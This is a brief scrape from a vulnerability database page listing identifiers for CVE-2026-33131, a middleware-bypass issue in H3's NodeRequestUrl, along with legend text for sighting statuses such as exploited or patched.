Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33131 (GCVE-0-2026-33131)

FKIE_CVE-2026-33131

GHSA-3VJ8-JMXQ-CGJ5

H3 NodeRequestUrl bugs

Middleware bypass

Tags

Sightings

Nomenclature